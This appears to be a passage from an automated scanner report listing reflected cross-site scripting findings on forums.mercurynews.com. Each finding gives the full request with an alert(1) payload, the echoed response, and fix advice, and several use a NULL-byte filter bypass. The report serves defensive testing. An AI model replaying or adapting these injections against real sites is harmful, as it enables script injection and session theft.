<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
avaScript">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / forums/forum%00f1250"-alert(1)-"6cf71db7b96/673";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=get
...[SNIP]...

3.66. http://forums.mercurynews.com/forums/forum/673 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /forums/forum/673

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00827f3"-alert(1)-"682449f4fa5 was submitted in the REST URL parameter 3. This input was echoed as 827f3"-alert(1)-"682449f4fa5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /forums/forum/673%00827f3"-alert(1)-"682449f4fa5 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 14 Nov 2010 23:13:58 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Set-Cookie: SESS7d37fc218a44afb27b49a326af87a923=96d5ff16ceb4d4857e2b1a534cbdbe8f; expires=Wed, 08 Dec 2010 02:47:18 GMT; path=/; domain=.forums.mercurynews.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 14 Nov 2010 23:14:22 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21992

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
cript">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / forums/forum/673%00827f3"-alert(1)-"682449f4fa5";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=getCiQu
...[SNIP]...

3.67. http://forums.mercurynews.com/forums/jrss/forum/602/5 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /forums/jrss/forum/602/5

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55459"-alert(1)-"f8751e5772f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /forums55459"-alert(1)-"f8751e5772f/jrss/forum/602/5?callback=processJsonTopics&js_param1=forum_topics_container HTTP/1.1
Accept: */*
Referer: http://www.mercurynews.com/opinion
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: forums.mercurynews.com
Proxy-Connection: Keep-Alive
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507; ZZRDB162,570,21=1; ZZFLSH=29; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 01:54:13 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 01:54:37 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22190

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
nguage="JavaScript">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / forums55459"-alert(1)-"f8751e5772f/jrss/forum/602/5?callback=processJsonTopics&js_param1=forum_topics_container";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";

...[SNIP]...

3.68. http://forums.mercurynews.com/forums/jrss/forum/602/5 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /forums/jrss/forum/602/5

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %0035e64"-alert(1)-"1c84bda8999 was submitted in the REST URL parameter 2. This input was echoed as 35e64"-alert(1)-"1c84bda8999 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /forums/jrss%0035e64"-alert(1)-"1c84bda8999/forum/602/5?callback=processJsonTopics&js_param1=forum_topics_container HTTP/1.1
Accept: */*
Referer: http://www.mercurynews.com/opinion
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: forums.mercurynews.com
Proxy-Connection: Keep-Alive
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507; ZZRDB162,570,21=1; ZZFLSH=29; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 01:54:22 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 01:54:46 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 22135

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
JavaScript">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / forums/jrss%0035e64"-alert(1)-"1c84bda8999/forum/602/5?callback=processJsonTopics&js_param1=forum_topics_container";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eV
...[SNIP]...

3.69. http://forums.mercurynews.com/forums/jrss/forum/602/5 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /forums/jrss/forum/602/5

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %0054fb5"-alert(1)-"d8ab2187b4c was submitted in the REST URL parameter 3. This input was echoed as 54fb5"-alert(1)-"d8ab2187b4c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /forums/jrss/forum%0054fb5"-alert(1)-"d8ab2187b4c/602/5?callback=processJsonTopics&js_param1=forum_topics_container HTTP/1.1
Accept: */*
Referer: http://www.mercurynews.com/opinion
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: forums.mercurynews.com
Proxy-Connection: Keep-Alive
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507; ZZRDB162,570,21=1; ZZFLSH=29; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 01:54:28 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 01:54:52 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 22135

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
ript">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / forums/jrss/forum%0054fb5"-alert(1)-"d8ab2187b4c/602/5?callback=processJsonTopics&js_param1=forum_topics_container";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=ge
...[SNIP]...

3.70. http://forums.mercurynews.com/forums/jrss/forum/602/5 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /forums/jrss/forum/602/5

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %0031fdf"-alert(1)-"ae07d35c128 was submitted in the REST URL parameter 4. This input was echoed as 31fdf"-alert(1)-"ae07d35c128 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /forums/jrss/forum/602%0031fdf"-alert(1)-"ae07d35c128/5?callback=processJsonTopics&js_param1=forum_topics_container HTTP/1.1
Accept: */*
Referer: http://www.mercurynews.com/opinion
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: forums.mercurynews.com
Proxy-Connection: Keep-Alive
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507; ZZRDB162,570,21=1; ZZFLSH=29; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 01:54:34 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 01:54:58 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 22135

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / forums/jrss/forum/602%0031fdf"-alert(1)-"ae07d35c128/5?callback=processJsonTopics&js_param1=forum_topics_container";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQ
...[SNIP]...

3.71. http://forums.mercurynews.com/forums/jrss/forum/602/5 [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /forums/jrss/forum/602/5

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 7fea7<script>alert(1)</script>441aed72aaa was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /forums/jrss/forum/602/5?callback=processJsonTopics7fea7<script>alert(1)</script>441aed72aaa&js_param1=forum_topics_container HTTP/1.1
Accept: */*
Referer: http://www.mercurynews.com/opinion
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: forums.mercurynews.com
Proxy-Connection: Keep-Alive
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507; ZZRDB162,570,21=1; ZZFLSH=29; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 01:22:40 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 01:23:04 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Length: 2427
Content-Type: text/html; charset=utf-8

processJsonTopics7fea7<script>alert(1)</script>441aed72aaa( { 'xml' : '<?xml version="1.0" encoding="utf-8" ?><rss version="2.0" xml:base="http://forums.mercurynews.com" xmlns:dc="http://purl.org/dc/e
...[SNIP]...

3.72. http://forums.mercurynews.com/forums/jrss/forum/602/5 [js_param1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /forums/jrss/forum/602/5

Issue detail

The value of the js_param1 request parameter is copied into the HTML document as plain text between tags. The payload 4134b<script>alert(1)</script>ea3b7054a28 was submitted in the js_param1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /forums/jrss/forum/602/5?callback=processJsonTopics&js_param1=forum_topics_container4134b<script>alert(1)</script>ea3b7054a28 HTTP/1.1
Accept: */*
Referer: http://www.mercurynews.com/opinion
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: forums.mercurynews.com
Proxy-Connection: Keep-Alive
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507; ZZRDB162,570,21=1; ZZFLSH=29; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 01:25:41 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 01:26:05 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Length: 2427
Content-Type: text/html; charset=utf-8

processJsonTopics( { 'xml' : '<?xml version="1.0" encoding="utf-8" ?><rss version="2.0" xml:base="http://forums.mercurynews.com" xmlns:dc="http://purl.org/dc/elements/1.1/"><channel> <title>MercuryNew
...[SNIP]...
</rss>' } , 'forum_topics_container4134b<script>alert(1)</script>ea3b7054a28' );

3.73. http://forums.mercurynews.com/forums/poll [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /forums/poll

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d7fc6"-alert(1)-"9628637350 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /forumsd7fc6"-alert(1)-"9628637350/poll HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 14 Nov 2010 23:12:05 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Set-Cookie: SESS7d37fc218a44afb27b49a326af87a923=d014b033f451192e0b481c31c0f9c21f; expires=Wed, 08 Dec 2010 02:45:25 GMT; path=/; domain=.forums.mercurynews.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 14 Nov 2010 23:12:29 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22022

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
nguage="JavaScript">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / forumsd7fc6"-alert(1)-"9628637350/poll";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=ge
...[SNIP]...

3.74. http://forums.mercurynews.com/forums/poll [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /forums/poll

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00cc000"-alert(1)-"9c127b33533 was submitted in the REST URL parameter 2. This input was echoed as cc000"-alert(1)-"9c127b33533 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /forums/poll%00cc000"-alert(1)-"9c127b33533 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 14 Nov 2010 23:12:30 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Set-Cookie: SESS7d37fc218a44afb27b49a326af87a923=ba286c7c4afb5835084961bfc4371e7b; expires=Wed, 08 Dec 2010 02:45:50 GMT; path=/; domain=.forums.mercurynews.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 14 Nov 2010 23:12:54 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21987

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
JavaScript">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / forums/poll%00cc000"-alert(1)-"9c127b33533";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=getCiQu
...[SNIP]...

3.75. http://forums.mercurynews.com/forums/syndication/jsonXmlToHtml.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /forums/syndication/jsonXmlToHtml.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dae6d"-alert(1)-"6579eb870fb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /forumsdae6d"-alert(1)-"6579eb870fb/syndication/jsonXmlToHtml.js HTTP/1.1
Accept: */*
Referer: http://www.mercurynews.com/opinion
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: forums.mercurynews.com
Proxy-Connection: Keep-Alive
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507; ZZRDB162,570,21=1; ZZFLSH=29; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 01:53:42 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 01:54:06 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 22150

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
nguage="JavaScript">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / forumsdae6d"-alert(1)-"6579eb870fb/syndication/jsonXmlToHtml.js";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.
...[SNIP]...

3.76. http://forums.mercurynews.com/forums/syndication/jsonXmlToHtml.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /forums/syndication/jsonXmlToHtml.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %0038e10"-alert(1)-"50952c2689f was submitted in the REST URL parameter 2. This input was echoed as 38e10"-alert(1)-"50952c2689f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /forums/syndication%0038e10"-alert(1)-"50952c2689f/jsonXmlToHtml.js HTTP/1.1
Accept: */*
Referer: http://www.mercurynews.com/opinion
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: forums.mercurynews.com
Proxy-Connection: Keep-Alive
